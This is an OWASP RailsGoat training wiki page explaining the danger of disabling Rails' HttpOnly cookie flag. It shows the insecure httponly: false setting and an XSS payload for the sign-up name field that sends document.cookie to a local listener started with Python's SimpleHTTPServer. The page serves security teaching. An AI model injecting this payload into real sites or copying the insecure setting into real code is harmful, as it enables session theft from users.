-
Notifications
You must be signed in to change notification settings - Fork 678
A2 Lack of HttpOnly Flag
The HttpOnly flag prevents access to the document.cookie attribute of the DOM via JavaScript. Helpful for limiting the impact of Cross-Site Scripting as it relates to session theft.
By default, Ruby on Rails protects its' cookies with the HttpOnly flag. However, it is possible to disable this security protection and is not recommended. You can disable this protection using the flag highlighted below. This is an insecure and unnecessary change.
Railsgoat::Application.config.session_store :cookie_store, key: '_railsgoat_session', httponly: falseNavigate to the sign-up page, sign up as a user, but in the first name field, enter:
<script>document.location="http://localhost:8000/" + document.cookie </script>Additionally, fire up Python's SimpleHTTPServer module using the following command:
$ python -m SimpleHTTPServerKeep the default configuration "as-is" and do not make this change. If this exists in your code base, remove it.
Can JavaScript interact with my session cookie?
© The Open Web Application Security Project - OWASP, 2015
Sections are divided by their OWASP Top Ten label (A1-A10) and marked as R4 and R5 for Rails 4 and 5.